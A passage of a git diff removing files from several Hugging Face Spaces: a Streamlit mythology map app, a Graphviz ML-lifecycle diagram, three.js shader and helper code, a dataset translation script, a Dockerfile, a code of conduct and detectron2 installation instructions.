    {place[3]}', - icon=folium.Icon(color='red') - ).add_to(m) - -# Function to update the map when a button is clicked -def update_map(place_data): - m.location = [place_data[1], place_data[2]] - m.zoom_start = 13 - folium_static(m) - - -for i in range(0, len(mythological_places), 3): - cols = st.columns(3) - for j in range(3): - if i + j < len(mythological_places): - with cols[j]: - if st.button(mythological_places[i + j][0]): - update_map(mythological_places[i + j]) -folium_static(m) - -st.markdown(""" - -Ásbyrgi: Thor, trying to prove his strength, challenged Sleipnir to a race. Odin agreed, but secretly fed Sleipnir his favorite snack, lightning bolts. With each step, Sleipnir left a massive print, and thus, Ásbyrgi was formed. - -Dimmuborgir: Loki, the trickster, held a housewarming party for the trolls and elves in Dimmuborgir. He spiced the food with a touch of mischief, causing everyone to break into spontaneous, ridiculous dances that lasted for days. - -Hekla: Freyja, the goddess of love, hosted a witches' convention on Hekla to improve their matchmaking skills. The witches accidentally brewed a love potion so powerful that it caused the volcano to erupt with passion. - -Elliðaey: The skoffin, tired of its isolation, devised a plan to hitch a ride off the island. It disguised itself as a mythical creature tour guide, successfully luring a boat full of curious tourists to Elliðaey. - -Mývatn: Balder, the god of light, organized a contest for the supernatural beings of Mývatn. The prize was an all-expenses-paid vacation to sunny Valhalla. The competition was fierce, with participants showing off their most impressive magic tricks. - -""") - - -st.markdown(""" -🏝️ Elliðaey Island: Home of the Skoffin -Elliðaey is a stunning and isolated island located off the southern coast of Iceland 🇮🇸. The island boasts a picturesque landscape and unique wildlife, including a legendary creature known as the skoffin 🐱‍🦲. - -Legend has it that the skoffin is a rare hybrid of a cat 🐱 and a fox 🦊, with a long tail and sharp teeth. The creature is incredibly elusive and is said to only appear to those who are pure of heart ❤️. Those who are lucky enough to spot the skoffin will be blessed with good luck and fortune 🍀. - -Despite its mythical reputation, Elliðaey has a long history of human habitation. In the 10th century, Viking settlers used the island for fishing 🎣 and farming 🌾. Throughout the centuries, the island has been used for a variety of purposes, including as a place of exile and as a hideaway for smugglers 🏴‍☠️. - -In the 1950s, a hunting lodge was built on the island, attracting wealthy hunters who came to Elliðaey to hunt puffins 🐧. However, the lodge was abandoned in the 1980s, and the island is now uninhabited 🏚️. - -Today, Elliðaey remains a popular destination for hikers 🚶‍♀️ and bird watchers 🦜 who come to enjoy the island's natural beauty and abundant wildlife 🌿. The island's fascinating history, legends, and stories continue to capture the imagination of those who visit 💭. Who knows, you might even catch a glimpse of the elusive skoffin 🤩! - - - - - -Regenerate response -""") - \ No newline at end of file diff --git a/spaces/awacke1/VizLib-GraphViz-SwimLanes-Digraph-ForMLLifecycle/app.py b/spaces/awacke1/VizLib-GraphViz-SwimLanes-Digraph-ForMLLifecycle/app.py deleted file mode 100644 index 7e1694ac065a1452bb436ad8e86203d7c7ec3ee3..0000000000000000000000000000000000000000 --- a/spaces/awacke1/VizLib-GraphViz-SwimLanes-Digraph-ForMLLifecycle/app.py +++ /dev/null @@ -1,74 +0,0 @@ -import streamlit as st -from graphviz import Digraph - -# Define the emoji to use for the swim lanes -SWIM_LANES = { - "Data Pipelines": "🔍", - "Build and Train Models": "🧪", - "Deploy and Predict": "🚀" -} - -# Define the graph structure -graph = Digraph() -graph.attr(rankdir="TB") # Top to Bottom or LR Left to Right -graph.attr(fontsize="20") -graph.attr(compound="true") -graph.attr(nodesep="0.5") - -# Define the nodes -graph.node("📊 Data Collection") -graph.node("🧹 Data Cleaning") -graph.node("🔧 Data Transformation") -graph.node("🔎 Feature Engineering") -graph.node("⚙️ Model Selection") -graph.node("🎓 Model Training") -graph.node("🚢 Model Deployment") -graph.node("📡 Model Serving") -graph.node("🔮 Predictions") -graph.node("👍 Feedback Collection") -graph.node("🤔 Feedback Processing") -graph.node("✍️ Model Updating") - -# Add the edges -graph.edge("📊 Data Collection", "🧹 Data Cleaning") -graph.edge("🧹 Data Cleaning", "🔧 Data Transformation") -graph.edge("🔧 Data Transformation", "🔎 Feature Engineering") -graph.edge("🔎 Feature Engineering", "⚙️ Model Selection") -graph.edge("⚙️ Model Selection", "🎓 Model Training") -graph.edge("🎓 Model Training", "🚢 Model Deployment") -graph.edge("🚢 Model Deployment", "📡 Model Serving") -graph.edge("📡 Model Serving", "🔮 Predictions") -graph.edge("🔮 Predictions", "👍 Feedback Collection") -graph.edge("👍 Feedback Collection", "🤔 Feedback Processing") -graph.edge("🤔 Feedback Processing", "✍️ Model Updating") -graph.edge("✍️ Model Updating", "🎓 Model Training") - -# Add the swim lanes -with graph.subgraph(name="cluster_0") as c: - c.attr(rank="1") - c.attr(label=SWIM_LANES["Data Pipelines"]) - c.edge("📊 Data Collection", "🧹 Data Cleaning", style="invis") - c.edge("🧹 Data Cleaning", "🔧 Data Transformation", style="invis") - -with graph.subgraph(name="cluster_1") as c: - c.attr(rank="2") - c.attr(label=SWIM_LANES["Build and Train Models"]) - c.edge("🔎 Feature Engineering", "⚙️ Model Selection", style="invis") - c.edge("⚙️ Model Selection", "🎓 Model Training", style="invis") - -with graph.subgraph(name="cluster_2") as c: - c.attr(rank="3") - c.attr(label=SWIM_LANES["Deploy and Predict"]) - c.edge("🚢 Model Deployment", "📡 Model Serving", style="invis") - c.edge("📡 Model Serving", "🔮 Predictions", style="invis") - -with graph.subgraph(name="cluster_3") as c: - c.attr(rank="4") - c.attr(label="Reinforcement Learning Human Feedback") - c.edge("🔮 Predictions", "👍 Feedback Collection", style="invis") - c.edge("👍 Feedback Collection", "🤔 Feedback Processing", style="invis") - c.edge("🤔 Feedback Processing", "✍️ Model Updating", style="invis") - -# Render the graph in Streamlit -# st.graphviz_chart(graph.source) -st.graphviz_chart(graph.source) \ No newline at end of file diff --git a/spaces/banana-projects/web3d/node_modules/three/examples/js/nodes/procedural/CheckerNode.js b/spaces/banana-projects/web3d/node_modules/three/examples/js/nodes/procedural/CheckerNode.js deleted file mode 100644 index 42d1b84ff21cdeeb7af1b5f9bc803bd6bf5b6005..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/examples/js/nodes/procedural/CheckerNode.js +++ /dev/null @@ -1,75 +0,0 @@ -/** - * @author sunag / http://www.sunag.com.br/ - */ - -import { TempNode } from '../core/TempNode.js'; -import { FunctionNode } from '../core/FunctionNode.js'; -import { UVNode } from '../accessors/UVNode.js'; - -function CheckerNode( uv ) { - - TempNode.call( this, 'f' ); - - this.uv = uv || new UVNode(); - -} - -CheckerNode.prototype = Object.create( TempNode.prototype ); -CheckerNode.prototype.constructor = CheckerNode; -CheckerNode.prototype.nodeType = "Noise"; - -CheckerNode.Nodes = ( function () { - - // https://github.com/mattdesl/glsl-checker/blob/master/index.glsl - - var checker = new FunctionNode( [ - "float checker( vec2 uv ) {", - - " float cx = floor( uv.x );", - " float cy = floor( uv.y ); ", - " float result = mod( cx + cy, 2.0 );", - - " return sign( result );", - - "}" - ].join( "\n" ) ); - - return { - checker: checker - }; - -} )(); - -CheckerNode.prototype.generate = function ( builder, output ) { - - var snoise = builder.include( CheckerNode.Nodes.checker ); - - return builder.format( snoise + '( ' + this.uv.build( builder, 'v2' ) + ' )', this.getType( builder ), output ); - -}; - -CheckerNode.prototype.copy = function ( source ) { - - TempNode.prototype.copy.call( this, source ); - - this.uv = source.uv; - -}; - -CheckerNode.prototype.toJSON = function ( meta ) { - - var data = this.getJSONNode( meta ); - - if ( ! data ) { - - data = this.createJSONNode( meta ); - - data.uv = this.uv.toJSON( meta ).uuid; - - } - - return data; - -}; - -export { CheckerNode }; diff --git a/spaces/banana-projects/web3d/node_modules/three/examples/js/shaders/TriangleBlurShader.js b/spaces/banana-projects/web3d/node_modules/three/examples/js/shaders/TriangleBlurShader.js deleted file mode 100644 index ae9ef55e691b438581af89a38eb8aba735ee676d..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/examples/js/shaders/TriangleBlurShader.js +++ /dev/null @@ -1,72 +0,0 @@ -/** - * @author zz85 / http://www.lab4games.net/zz85/blog - * - * Triangle blur shader - * based on glfx.js triangle blur shader - * https://github.com/evanw/glfx.js - * - * A basic blur filter, which convolves the image with a - * pyramid filter. The pyramid filter is separable and is applied as two - * perpendicular triangle filters. - */ - -THREE.TriangleBlurShader = { - - uniforms : { - - "texture": { value: null }, - "delta": { value: new THREE.Vector2( 1, 1 ) } - - }, - - vertexShader: [ - - "varying vec2 vUv;", - - "void main() {", - - "vUv = uv;", - "gl_Position = projectionMatrix * modelViewMatrix * vec4( position, 1.0 );", - - "}" - - ].join( "\n" ), - - fragmentShader: [ - - "#include ", - - "#define ITERATIONS 10.0", - - "uniform sampler2D texture;", - "uniform vec2 delta;", - - "varying vec2 vUv;", - - "void main() {", - - "vec4 color = vec4( 0.0 );", - - "float total = 0.0;", - - // randomize the lookup values to hide the fixed number of samples - - "float offset = rand( vUv );", - - "for ( float t = -ITERATIONS; t <= ITERATIONS; t ++ ) {", - - "float percent = ( t + offset - 0.5 ) / ITERATIONS;", - "float weight = 1.0 - abs( percent );", - - "color += texture2D( texture, vUv + delta * percent ) * weight;", - "total += weight;", - - "}", - - "gl_FragColor = color / total;", - - "}" - - ].join( "\n" ) - -}; diff --git a/spaces/banana-projects/web3d/node_modules/three/src/helpers/SkeletonHelper.js b/spaces/banana-projects/web3d/node_modules/three/src/helpers/SkeletonHelper.js deleted file mode 100644 index 0756de3a26822cb5e3afe8c38ca304b1d6436cb8..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/src/helpers/SkeletonHelper.js +++ /dev/null @@ -1,128 +0,0 @@ -/** - * @author Sean Griffin / http://twitter.com/sgrif - * @author Michael Guerrero / http://realitymeltdown.com - * @author mrdoob / http://mrdoob.com/ - * @author ikerr / http://verold.com - * @author Mugen87 / https://github.com/Mugen87 - */ - -import { LineSegments } from '../objects/LineSegments.js'; -import { Matrix4 } from '../math/Matrix4.js'; -import { VertexColors } from '../constants.js'; -import { LineBasicMaterial } from '../materials/LineBasicMaterial.js'; -import { Color } from '../math/Color.js'; -import { Vector3 } from '../math/Vector3.js'; -import { BufferGeometry } from '../core/BufferGeometry.js'; -import { Float32BufferAttribute } from '../core/BufferAttribute.js'; -import { Object3D } from '../core/Object3D.js'; - -function getBoneList( object ) { - - var boneList = []; - - if ( object && object.isBone ) { - - boneList.push( object ); - - } - - for ( var i = 0; i < object.children.length; i ++ ) { - - boneList.push.apply( boneList, getBoneList( object.children[ i ] ) ); - - } - - return boneList; - -} - -function SkeletonHelper( object ) { - - var bones = getBoneList( object ); - - var geometry = new BufferGeometry(); - - var vertices = []; - var colors = []; - - var color1 = new Color( 0, 0, 1 ); - var color2 = new Color( 0, 1, 0 ); - - for ( var i = 0; i < bones.length; i ++ ) { - - var bone = bones[ i ]; - - if ( bone.parent && bone.parent.isBone ) { - - vertices.push( 0, 0, 0 ); - vertices.push( 0, 0, 0 ); - colors.push( color1.r, color1.g, color1.b ); - colors.push( color2.r, color2.g, color2.b ); - - } - - } - - geometry.addAttribute( 'position', new Float32BufferAttribute( vertices, 3 ) ); - geometry.addAttribute( 'color', new Float32BufferAttribute( colors, 3 ) ); - - var material = new LineBasicMaterial( { vertexColors: VertexColors, depthTest: false, depthWrite: false, transparent: true } ); - - LineSegments.call( this, geometry, material ); - - this.root = object; - this.bones = bones; - - this.matrix = object.matrixWorld; - this.matrixAutoUpdate = false; - -} - -SkeletonHelper.prototype = Object.create( LineSegments.prototype ); -SkeletonHelper.prototype.constructor = SkeletonHelper; - -SkeletonHelper.prototype.updateMatrixWorld = function () { - - var vector = new Vector3(); - - var boneMatrix = new Matrix4(); - var matrixWorldInv = new Matrix4(); - - return function updateMatrixWorld( force ) { - - var bones = this.bones; - - var geometry = this.geometry; - var position = geometry.getAttribute( 'position' ); - - matrixWorldInv.getInverse( this.root.matrixWorld ); - - for ( var i = 0, j = 0; i < bones.length; i ++ ) { - - var bone = bones[ i ]; - - if ( bone.parent && bone.parent.isBone ) { - - boneMatrix.multiplyMatrices( matrixWorldInv, bone.matrixWorld ); - vector.setFromMatrixPosition( boneMatrix ); - position.setXYZ( j, vector.x, vector.y, vector.z ); - - boneMatrix.multiplyMatrices( matrixWorldInv, bone.parent.matrixWorld ); - vector.setFromMatrixPosition( boneMatrix ); - position.setXYZ( j + 1, vector.x, vector.y, vector.z ); - - j += 2; - - } - - } - - geometry.getAttribute( 'position' ).needsUpdate = true; - - Object3D.prototype.updateMatrixWorld.call( this, force ); - - }; - -}(); - -export { SkeletonHelper }; diff --git a/spaces/banana-projects/web3d/node_modules/three/src/materials/MeshStandardMaterial.d.ts b/spaces/banana-projects/web3d/node_modules/three/src/materials/MeshStandardMaterial.d.ts deleted file mode 100644 index 7fca97f515a46bf331636754fcc6c362e7298d13..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/src/materials/MeshStandardMaterial.d.ts +++ /dev/null @@ -1,73 +0,0 @@ -import { Color } from './../math/Color'; -import { Texture } from './../textures/Texture'; -import { Vector2 } from './../math/Vector2'; -import { MaterialParameters, Material } from './Material'; - -export interface MeshStandardMaterialParameters extends MaterialParameters { - color?: Color | string | number; - roughness?: number; - metalness?: number; - map?: Texture; - lightMap?: Texture; - lightMapIntensity?: number; - aoMap?: Texture; - aoMapIntensity?: number; - emissive?: Color | string | number; - emissiveIntensity?: number; - emissiveMap?: Texture; - bumpMap?: Texture; - bumpScale?: number; - normalMap?: Texture; - normalScale?: Vector2; - displacementMap?: Texture; - displacementScale?: number; - displacementBias?: number; - roughnessMap?: Texture; - metalnessMap?: Texture; - alphaMap?: Texture; - envMap?: Texture; - envMapIntensity?: number; - refractionRatio?: number; - wireframe?: boolean; - wireframeLinewidth?: number; - skinning?: boolean; - morphTargets?: boolean; - morphNormals?: boolean; -} - -export class MeshStandardMaterial extends Material { - constructor(parameters?: MeshStandardMaterialParameters); - - defines: any; - color: Color; - roughness: number; - metalness: number; - map: Texture | null; - lightMap: Texture | null; - lightMapIntensity: number; - aoMap: Texture | null; - aoMapIntensity: number; - emissive: Color; - emissiveIntensity: number; - emissiveMap: Texture | null; - bumpMap: Texture | null; - bumpScale: number; - normalMap: Texture | null; - normalScale: number; - displacementMap: Texture | null; - displacementScale: number; - displacementBias: number; - roughnessMap: Texture | null; - metalnessMap: Texture | null; - alphaMap: Texture | null; - envMap: Texture | null; - envMapIntensity: number; - refractionRatio: number; - wireframe: boolean; - wireframeLinewidth: number; - skinning: boolean; - morphTargets: boolean; - morphNormals: boolean; - - setValues(parameters: MeshStandardMaterialParameters): void; -} diff --git a/spaces/bastiendechamps/geoguessr-bot/geoguessr_bot/interfaces.py b/spaces/bastiendechamps/geoguessr-bot/geoguessr_bot/interfaces.py deleted file mode 100644 index 34574f46d0400032591d2bb0ab4b56dc14eeb9c2..0000000000000000000000000000000000000000 --- a/spaces/bastiendechamps/geoguessr-bot/geoguessr_bot/interfaces.py +++ /dev/null @@ -1,23 +0,0 @@ -import numpy as np -from pydantic.main import BaseModel - - -class Coordinate(BaseModel): - latitude: float - longitude: float - - def __str__(self): - return f"({round(self.latitude, 6)}, {round(self.longitude, 6)})" - - def to_radians(self) -> 'Coordinate': - return Coordinate( - latitude=self.latitude * np.pi / 180., - longitude=self.longitude * np.pi / 180. - ) - - @staticmethod - def from_radians(latitude: float, longitude: float) -> 'Coordinate': - return Coordinate( - latitude=latitude * 180. / np.pi, - longitude=longitude * 180. / np.pi - ) \ No newline at end of file diff --git a/spaces/bigPear/digitalWDF/tests/translate_hh_rlhf.py b/spaces/bigPear/digitalWDF/tests/translate_hh_rlhf.py deleted file mode 100644 index 1a20ee6fe90bd2daacb29dbf6b9547c1dfa8f7ee..0000000000000000000000000000000000000000 --- a/spaces/bigPear/digitalWDF/tests/translate_hh_rlhf.py +++ /dev/null @@ -1,69 +0,0 @@ -# coding=utf-8 - -import os -import json -import time -from datasets import load_dataset -from googletrans import Translator - - -def main(): - split = "train" - - translator = Translator() - def translate(text: str) -> str: - if len(text) == 0: - return "" - if text.startswith("http") or text.startswith("Reddit.com"): - return text - - local_patience = 0 - while local_patience < 5: - try: - result = translator.translate(text, dest="zh-cn", src="en") - print("translate: {} -> {}".format(text, result.text)) - time.sleep(1) - return result.text - except Exception: - print(f"Error occurred while translating {text}, retrying...") - local_patience += 1 - time.sleep(10) - - raise Exception - - dataset = load_dataset("../data/hh_rlhf_en", split=split) - - if os.path.exists(f"{split}.json"): - with open(f"{split}.json", "r", encoding="utf-8", newline="\n") as f: - jsondata = json.load(f) - else: - jsondata = [] - - - global_patience = 0 - i = len(jsondata) - while i < len(dataset): - try: - jsondata.append({ - "instruction": translate(dataset[i]["instruction"]), - "output": [translate(output) for output in dataset[i]["output"]], - "history": [[translate(hist[0]), translate(hist[1])] for hist in dataset[i]["history"]] - }) - i += 1 - global_patience = 0 - - if i % 10 == 0: - with open(f"{split}.json", "w", encoding="utf-8", newline="\n") as f: - json.dump(jsondata, f, indent=2, ensure_ascii=False) - - except Exception: - print(f"Error occurred at {i}-th data, retrying...") - global_patience += 1 - time.sleep(50) - - if global_patience > 10: - print("Stop") - return - -if __name__ == "__main__": - main() diff --git a/spaces/bnkkkkknn/bnkkkkknn/Dockerfile b/spaces/bnkkkkknn/bnkkkkknn/Dockerfile deleted file mode 100644 index 3698c7cb7938e025afc53b18a571ae2961fbdffe..0000000000000000000000000000000000000000 --- a/spaces/bnkkkkknn/bnkkkkknn/Dockerfile +++ /dev/null @@ -1,34 +0,0 @@ -# Build Stage -# 使用 golang:alpine 作为构建阶段的基础镜像 -FROM golang:alpine AS builder - -# 添加 git,以便之后能从GitHub克隆项目 -RUN apk --no-cache add git - -# 从 GitHub 克隆 go-proxy-bingai 项目到 /workspace/app 目录下 -RUN git clone https://github.com/Harry-zklcdc/go-proxy-bingai.git /workspace/app - -# 设置工作目录为之前克隆的项目目录 -WORKDIR /workspace/app - -# 编译 go 项目。-ldflags="-s -w" 是为了减少编译后的二进制大小 -RUN go build -ldflags="-s -w" -tags netgo -trimpath -o go-proxy-bingai main.go - -# Runtime Stage -# 使用轻量级的 alpine 镜像作为运行时的基础镜像 -FROM alpine - -# 设置工作目录 -WORKDIR /workspace/app - -# 从构建阶段复制编译后的二进制文件到运行时镜像中 -COPY --from=builder /workspace/app/go-proxy-bingai . - -# 设置环境变量,此处为随机字符 -ENV Go_Proxy_BingAI_USER_TOKEN_1="kJs8hD92ncMzLaoQWYtX5rG6bE3fZ4iO" - -# 暴露8080端口 -EXPOSE 8080 - -# 容器启动时运行的命令 -CMD ["/workspace/app/go-proxy-bingai"] \ No newline at end of file diff --git a/spaces/brainblow/AudioCreator_Music-Audio_Generation/CODE_OF_CONDUCT.md b/spaces/brainblow/AudioCreator_Music-Audio_Generation/CODE_OF_CONDUCT.md deleted file mode 100644 index 83f431e8feeb7e80d571f39c9f6c1b96857b5f85..0000000000000000000000000000000000000000 --- a/spaces/brainblow/AudioCreator_Music-Audio_Generation/CODE_OF_CONDUCT.md +++ /dev/null @@ -1,80 +0,0 @@ -# Code of Conduct - -## Our Pledge - -In the interest of fostering an open and welcoming environment, we as -contributors and maintainers pledge to make participation in our project and -our community a harassment-free experience for everyone, regardless of age, body -size, disability, ethnicity, sex characteristics, gender identity and expression, -level of experience, education, socio-economic status, nationality, personal -appearance, race, religion, or sexual identity and orientation. - -## Our Standards - -Examples of behavior that contributes to creating a positive environment -include: - -* Using welcoming and inclusive language -* Being respectful of differing viewpoints and experiences -* Gracefully accepting constructive criticism -* Focusing on what is best for the community -* Showing empathy towards other community members - -Examples of unacceptable behavior by participants include: - -* The use of sexualized language or imagery and unwelcome sexual attention or -advances -* Trolling, insulting/derogatory comments, and personal or political attacks -* Public or private harassment -* Publishing others' private information, such as a physical or electronic -address, without explicit permission -* Other conduct which could reasonably be considered inappropriate in a -professional setting - -## Our Responsibilities - -Project maintainers are responsible for clarifying the standards of acceptable -behavior and are expected to take appropriate and fair corrective action in -response to any instances of unacceptable behavior. - -Project maintainers have the right and responsibility to remove, edit, or -reject comments, commits, code, wiki edits, issues, and other contributions -that are not aligned to this Code of Conduct, or to ban temporarily or -permanently any contributor for other behaviors that they deem inappropriate, -threatening, offensive, or harmful. - -## Scope - -This Code of Conduct applies within all project spaces, and it also applies when -an individual is representing the project or its community in public spaces. -Examples of representing a project or community include using an official -project e-mail address, posting via an official social media account, or acting -as an appointed representative at an online or offline event. Representation of -a project may be further defined and clarified by project maintainers. - -This Code of Conduct also applies outside the project spaces when there is a -reasonable belief that an individual's behavior may have a negative impact on -the project or its community. - -## Enforcement - -Instances of abusive, harassing, or otherwise unacceptable behavior may be -reported by contacting the project team at . All -complaints will be reviewed and investigated and will result in a response that -is deemed necessary and appropriate to the circumstances. The project team is -obligated to maintain confidentiality with regard to the reporter of an incident. -Further details of specific enforcement policies may be posted separately. - -Project maintainers who do not follow or enforce the Code of Conduct in good -faith may face temporary or permanent repercussions as determined by other -members of the project's leadership. - -## Attribution - -This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, -available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html - -[homepage]: https://www.contributor-covenant.org - -For answers to common questions about this code of conduct, see -https://www.contributor-covenant.org/faq diff --git a/spaces/breadlicker45/story-gen/app.py b/spaces/breadlicker45/story-gen/app.py deleted file mode 100644 index 0b241f37eae052609ebd96250dca365a21a22bcc..0000000000000000000000000000000000000000 --- a/spaces/breadlicker45/story-gen/app.py +++ /dev/null @@ -1,68 +0,0 @@ -import streamlit as st -import time -from transformers import pipeline -import torch -trust_remote_code=True -st.markdown('## story-generation from Breadlicker45') -use_auth_token=True -@st.cache(allow_output_mutation=True, suppress_st_warning =True, show_spinner=False) -def get_model(): - return pipeline('text-generation', model=model, do_sample=True) - -col1, col2 = st.columns([2,1]) - -with st.sidebar: - st.markdown('## Model Parameters') - - max_length = st.slider('Max text length', 80, 2000, 80) - - min_length = st.slider('Min text length', 80, 500, 80) - - num_beams = st.slider('N° tree beams search', 1, 15, 1) - - temperature = st.slider('temperature', 0.0, 1.0, 0.5, 0.1) - - early_stopping = st.selectbox( - 'Early stopping text generation', - ('True', 'False'), key={'True' : True, 'False': False}, index=0) - - no_ngram_repeat = st.slider('Max repetition limit', 1, 3, 1) - - - -with col1: - prompt= st.text_area('Your prompt here', - '''in a world''') - -with col2: - select_model = st.radio( - "Select the model to use:", - ('StoryPy', 'null'), index = 0) - - if select_model == 'StoryPy': - model = 'BreadAi/StoryPy' - elif select_model == 'null': - model = 'BreadAi/StoryPy' - elif select_model == 'MuseNeo': - model = 'breadlicker45/MuseNeo' - elif select_model == 'MusePy-1-1': - model = 'BreadAi/MusePy-1-1' - elif select_model == 'MuseCan': - model = 'BreadAi/MuseCan' - - with st.spinner('Loading Model... (This may take a while)'): - generator = get_model() - st.success('Model loaded correctly!') - -gen = st.info('Generating text...') -answer = generator(prompt, - max_length=max_length, no_repeat_ngram_size=no_ngram_repeat, - early_stopping=early_stopping, num_beams=num_beams, min_length=min_length, temperature=temperature) -gen.empty() - -lst = answer[0]['generated_text'] - -t = st.empty() -for i in range(len(lst)): - t.markdown("#### %s" % lst[0:i]) - time.sleep(0.04) \ No newline at end of file diff --git a/spaces/brjathu/HMR2.0/vendor/detectron2/INSTALL.md b/spaces/brjathu/HMR2.0/vendor/detectron2/INSTALL.md deleted file mode 100644 index f522e6f624372f39ee5366f5b032c0cd1ebcf5c8..0000000000000000000000000000000000000000 --- a/spaces/brjathu/HMR2.0/vendor/detectron2/INSTALL.md +++ /dev/null @@ -1,261 +0,0 @@ -## Installation - -### Requirements -- Linux or macOS with Python ≥ 3.7 -- PyTorch ≥ 1.8 and [torchvision](https://github.com/pytorch/vision/) that matches the PyTorch installation. - Install them together at [pytorch.org](https://pytorch.org) to make sure of this -- OpenCV is optional but needed by demo and visualization - - -### Build Detectron2 from Source - -gcc & g++ ≥ 5.4 are required. [ninja](https://ninja-build.org/) is optional but recommended for faster build. -After having them, run: -``` -python -m pip install 'git+https://github.com/facebookresearch/detectron2.git' -# (add --user if you don't have permission) - -# Or, to install it from a local clone: -git clone https://github.com/facebookresearch/detectron2.git -python -m pip install -e detectron2 - -# On macOS, you may need to prepend the above commands with a few environment variables: -CC=clang CXX=clang++ ARCHFLAGS="-arch x86_64" python -m pip install ... -``` - -To __rebuild__ detectron2 that's built from a local clone, use `rm -rf build/ **/*.so` to clean the -old build first. You often need to rebuild detectron2 after reinstalling PyTorch. - -### Install Pre-Built Detectron2 (Linux only) - -Choose from this table to install [v0.6 (Oct 2021)](https://github.com/facebookresearch/detectron2/releases): - -
    CUDA torch 1.10torch 1.9torch 1.8
    11.3
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cu113/torch1.10/index.html
    -
    11.1
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cu111/torch1.10/index.html
    -
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cu111/torch1.9/index.html
    -
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cu111/torch1.8/index.html
    -
    10.2
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cu102/torch1.10/index.html
    -
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cu102/torch1.9/index.html
    -
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cu102/torch1.8/index.html
    -
    10.1
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cu101/torch1.8/index.html
    -
    cpu
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cpu/torch1.10/index.html
    -
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cpu/torch1.9/index.html
    -
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cpu/torch1.8/index.html
    -
    - -Note that: -1. The pre-built packages have to be used with corresponding version of CUDA and the official package of PyTorch. - Otherwise, please build detectron2 from source. -2. New packages are released every few months. Therefore, packages may not contain latest features in the main - branch and may not be compatible with the main branch of a research project that uses detectron2 - (e.g. those in [projects](projects)). - -### Common Installation Issues - -Click each issue for its solutions: - -
    - -Undefined symbols that looks like "TH..","at::Tensor...","torch..." - -
    - -This usually happens when detectron2 or torchvision is not -compiled with the version of PyTorch you're running. - -If the error comes from a pre-built torchvision, uninstall torchvision and pytorch and reinstall them -following [pytorch.org](http://pytorch.org). So the versions will match. - -If the error comes from a pre-built detectron2, check [release notes](https://github.com/facebookresearch/detectron2/releases), -uninstall and reinstall the correct pre-built detectron2 that matches pytorch version. - -If the error comes from detectron2 or torchvision that you built manually from source, -remove files you built (`build/`, `**/*.so`) and rebuild it so it can pick up the version of pytorch currently in your environment. - -If the above instructions do not resolve this problem, please provide an environment (e.g. a dockerfile) that can reproduce the issue. -
    - -
    - -Missing torch dynamic libraries, OR segmentation fault immediately when using detectron2. - -This usually happens when detectron2 or torchvision is not -compiled with the version of PyTorch you're running. See the previous common issue for the solution. -
    - -
    - -Undefined C++ symbols (e.g. "GLIBCXX..") or C++ symbols not found. - -
    -Usually it's because the library is compiled with a newer C++ compiler but run with an old C++ runtime. - -This often happens with old anaconda. -It may help to run `conda update libgcc` to upgrade its runtime. - -The fundamental solution is to avoid the mismatch, either by compiling using older version of C++ -compiler, or run the code with proper C++ runtime. -To run the code with a specific C++ runtime, you can use environment variable `LD_PRELOAD=/path/to/libstdc++.so`. - -
    - -
    - -"nvcc not found" or "Not compiled with GPU support" or "Detectron2 CUDA Compiler: not available". - -
    -CUDA is not found when building detectron2. -You should make sure - -``` -python -c 'import torch; from torch.utils.cpp_extension import CUDA_HOME; print(torch.cuda.is_available(), CUDA_HOME)' -``` - -print `(True, a directory with cuda)` at the time you build detectron2. - -Most models can run inference (but not training) without GPU support. To use CPUs, set `MODEL.DEVICE='cpu'` in the config. -
    - -
    - -"invalid device function" or "no kernel image is available for execution". - -
    -Two possibilities: - -* You build detectron2 with one version of CUDA but run it with a different version. - - To check whether it is the case, - use `python -m detectron2.utils.collect_env` to find out inconsistent CUDA versions. - In the output of this command, you should expect "Detectron2 CUDA Compiler", "CUDA_HOME", "PyTorch built with - CUDA" - to contain cuda libraries of the same version. - - When they are inconsistent, - you need to either install a different build of PyTorch (or build by yourself) - to match your local CUDA installation, or install a different version of CUDA to match PyTorch. - -* PyTorch/torchvision/Detectron2 is not built for the correct GPU SM architecture (aka. compute capability). - - The architecture included by PyTorch/detectron2/torchvision is available in the "architecture flags" in - `python -m detectron2.utils.collect_env`. It must include - the architecture of your GPU, which can be found at [developer.nvidia.com/cuda-gpus](https://developer.nvidia.com/cuda-gpus). - - If you're using pre-built PyTorch/detectron2/torchvision, they have included support for most popular GPUs already. - If not supported, you need to build them from source. - - When building detectron2/torchvision from source, they detect the GPU device and build for only the device. - This means the compiled code may not work on a different GPU device. - To recompile them for the correct architecture, remove all installed/compiled files, - and rebuild them with the `TORCH_CUDA_ARCH_LIST` environment variable set properly. - For example, `export TORCH_CUDA_ARCH_LIST="6.0;7.0"` makes it compile for both P100s and V100s. -
    - -
    - -Undefined CUDA symbols; Cannot open libcudart.so - -
    -The version of NVCC you use to build detectron2 or torchvision does -not match the version of CUDA you are running with. -This often happens when using anaconda's CUDA runtime. - -Use `python -m detectron2.utils.collect_env` to find out inconsistent CUDA versions. -In the output of this command, you should expect "Detectron2 CUDA Compiler", "CUDA_HOME", "PyTorch built with - CUDA" -to contain cuda libraries of the same version. - -When they are inconsistent, -you need to either install a different build of PyTorch (or build by yourself) -to match your local CUDA installation, or install a different version of CUDA to match PyTorch. -
